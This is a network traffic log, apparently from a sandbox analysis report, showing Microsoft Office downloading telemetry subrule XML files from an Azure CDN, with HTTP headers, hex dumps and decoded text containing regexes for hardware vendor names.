2024-10-30 02:55:39 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
6192.168.2.55250913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:40 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
ETag: "0x8DC582B9964B277"
x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-16849878b78q9m8bqvwuva4svc00000005x000000000n0ps
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:40 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
7192.168.2.55251013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 415
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
ETag: "0x8DC582B9F6F3512"
x-ms-request-id: b99e46b1-a01e-001e-0499-2549ef000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-15b8d89586fzhrwgk23ex2bvhw0000000af0000000001x9g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:40 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


Session IDSource IPSource PortDestination IPDestination Port
8192.168.2.55251313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 467
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
ETag: "0x8DC582BA6C038BC"
x-ms-request-id: d2fd6492-501e-0029-41d9-29d0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-17c5cb586f626sn8grcgm1gf8000000005v000000000edqh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:40 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
9192.168.2.55251213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:40 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 632
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6E3779E"
x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-16849878b7828dsgct3vrzta7000000005wg000000007am2
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:40 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


Session IDSource IPSource PortDestination IPDestination Port
10192.168.2.55251113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:40 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 471
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
ETag: "0x8DC582BB10C598B"
x-ms-request-id: d919e2dc-e01e-001f-153d-261633000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-r197bdfb6b4skzzvqpzzd3xetg00000006wg000000006082
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:40 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
11192.168.2.55251613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBAD04B7B"
x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-16849878b7828dsgct3vrzta7000000005s000000000snr1
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
12192.168.2.55251813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
ETag: "0x8DC582BA310DA18"
x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-15b8d89586fhl2qtatrz3vfkf00000000dmg00000000bxn8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
13192.168.2.55251913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
ETag: "0x8DC582B9018290B"
x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-16849878b78g2m84h2v9sta290000000067000000000uhs7
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
14192.168.2.55251713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 486
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
ETag: "0x8DC582BB344914B"
x-ms-request-id: 9b80997a-f01e-0003-4c76-2a4453000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-r197bdfb6b4hsj5bywyqk9r2xw00000008ug00000000gy3e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
15192.168.2.55252013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:40 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:40 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
ETag: "0x8DC582B9698189B"
x-ms-request-id: 30dbe6fd-101e-0034-66db-2696ff000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025540Z-17c5cb586f67hfgj2durhqcxk800000006d0000000002zs2
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
16192.168.2.55252113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:41 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:41 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA701121"
x-ms-request-id: 2fd6bd5d-d01e-007a-394f-26f38c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025541Z-16849878b786jv8w2kpaf5zkqs000000066000000000xnq7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:41 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
17192.168.2.55252313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:41 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:41 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:41 GMT
Content-Type: text/xml
Content-Length: 477
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
ETag: "0x8DC582BB8CEAC16"
x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025541Z-15b8d89586fmc8ck21zz2rtg1w00000004s00000000021v5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
